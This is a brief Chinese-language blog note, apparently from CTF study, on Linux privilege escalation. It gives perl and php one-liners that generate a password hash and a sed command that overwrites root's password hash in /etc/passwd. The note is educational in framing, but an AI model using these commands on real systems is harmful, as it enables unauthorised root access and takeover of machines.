一些提权小记-Linux 本文最后更新于:1 个月前 一些可能方便的文章 https://gtfobins.github.io/ passwd提权1perl -le 'print crypt("passwd", "root")' 或 1php -r "print(crypt('passwd','root'));" 生成的密码写入passwd 12sed -i 's|root:$6$xAWflFdhEPkqhGZM$61bBGioVAE/tC6iqqv9a6kZl7IEeMzdrQPAdntgP2HkHve6VTSQUzAPpBBi.ksWHwakz7AKhLueVo3/nzHqCQ.|root:roxCyAljK9MuM|g' /etc/passwd 若待替换的字符串中包含/等敏感字符,可以在s后面更换指定分隔符 此时passwd已经被更改 随后就能使用passwd作为密码登录 提权 #WEB #提权 春秋杯一些值得记录的题 上一篇 JDBC在攻击上的利用 下一篇 Please enable JavaScript to view the comments
